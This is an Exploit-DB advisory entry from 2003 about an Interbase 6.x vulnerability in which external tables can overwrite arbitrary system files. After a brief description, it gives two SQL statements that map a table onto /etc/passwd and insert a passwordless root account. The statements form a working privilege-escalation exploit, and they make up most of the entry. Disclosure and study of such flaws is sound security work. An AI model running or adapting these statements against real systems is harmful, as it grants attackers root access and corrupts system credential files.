Interbase 6.x - External Table File Verification

EDB-ID:

22462

CVE:

N/A




Platform:

Multiple

Date:

2003-04-05


source: https://www.securityfocus.com/bid/7291/info

A vulnerability has been reported for Interbase that may result in the corruption of arbitrary system files. The vulnerability exists due to insufficient checks performed when creating or manipulating external databases. 

create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');